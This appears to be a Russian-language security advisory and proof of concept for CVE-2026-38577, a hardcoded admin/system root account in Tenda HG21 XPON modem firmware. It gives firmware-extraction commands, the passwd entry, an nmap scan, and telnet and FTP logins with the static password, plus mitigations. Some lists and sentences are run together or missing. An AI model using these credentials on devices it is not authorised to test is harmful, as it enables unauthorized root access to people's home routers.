
Доказательство концепции, демонстрирующее жёстко заданные учётные данные root (admin/system) в прошивке модема Tenda HG21 XPON, позволяющие получить несанкционированный root-доступ через telnet и FTP.
| Поле | Значение |
|---|---|
| Идентификатор CVE | CVE-2026-38577 |
| Производитель | Tenda |
| Продукт | Tenda HG21 (XPON-оптический модем) |
| Затронутая версия | V4.0.0-260302 |
| Ключ продукта | HG21-V1.0-TDE01 |
| Версия оборудования | V1.0 |
| Дата сборки прошивки | 2026-03-02 |
| Файл прошивки | US_HG21re_300002982_en_xpon_2.zip |
| Класс уязвимости | CWE-798: Использование жестко заданных учётных данных |
| Исследователь | Anmol Singh Rajput — независимый исследователь безопасности |
| Статус раскрытия | Производитель ещё не уведомлён на момент резервирования CVE — применяется 90-дневный срок ответственного раскрытия с даты назначения CVE |
Анализ прошивки XPON-оптического модема Tenda HG21 выявил жестко заданную административную учётную запись, встроенную в поставляемый образ прошивки. Учётная запись имеет полные привилегии root (UID 0), а её учётные данные статичны на всех устройствах, что означает: любой злоумышленник, способный обратиться к открытой службе управления на уязвимом устройстве, может аутентифицироваться как root, не зная установленного пользователем пароля веб-интерфейса.
/etc/passwd извлечённой прошивки присутствует запись admin с
SHA256crypt-хешем пароля, который соответствует статическому значению system.0, то есть это и есть root, а не ограниченная
служебная учётная запись./etc/shadow отсутствует, поэтому слабый/статический хеш в passwd
является единственным барьером, защищающим учётную запись./etc/inetd.conf запускает telnetd и ftpd, оба процесса работают от
имени root, поэтому жестко заданная учётная запись доступна по сети,
а не только через последовательный/UART-консоль.Злоумышленник, имеющий сетевой доступ к службам telnet (TCP/23) или FTP
(TCP/21) уязвимого устройства, может войти как admin, используя статический
пароль, и получить root-оболочку / доступ к файлам на уровне root. Это
позволяет, как минимум:
Векторы CVSS из первоначальной заявки (оценка производителя может отличаться после публикации):
Это PoC на основе учётных данных — он демонстрирует, что жестко заданная учётная запись проходит аутентификацию и предоставляет root, а не эксплойт повреждения памяти. Запускайте его только против устройства, которым вы владеете или на тестирование которого у вас есть явное разрешение.
# Извлеките прошивку (binwalk или инструмент производителя на ваш выбор)
binwalk -e US_HG21re_300002982_en_xpon_2.bin
# Найдите и проверьте файл passwd
find . -name passwd
cat squashfs-root/etc/passwd
# -> admin:<sha256crypt-хеш-"system">:0:0:root:/root:/bin/sh
nmap -p 21,23 <target-ip>
telnet <target-ip>
# login: admin
# password: system
ftp <target-ip>
# Name: admin
# Password: system
Успешный вход в любую из служб возвращает сеанс оболочки/FTP с привилегиями
root (id сообщит uid=0(root)).
admin/system или, как минимум, принудительно задавать уникальный
случайный пароль для каждого устройства при первой загрузке (не выводимый
только из серийного номера).telnetd/ftpd по умолчанию; требовать явного согласия и
аутентифицированного зашифрованного канала (SSH/SFTP) для удалённого
администрирования.| Дата | Событие |
|---|---|
| 2026-03-02 | Выпущена уязвимая сборка прошивки |
| — | Обнаружено в ходе независимого анализа прошивки |
| 2026-04-09 | CVE-2026-38577 зарезервирован через MITRE |
| — | Уведомление производителя ожидается (90-дневное окно раскрытия с момента назначения CVE) |
Обнаружено и сообщено: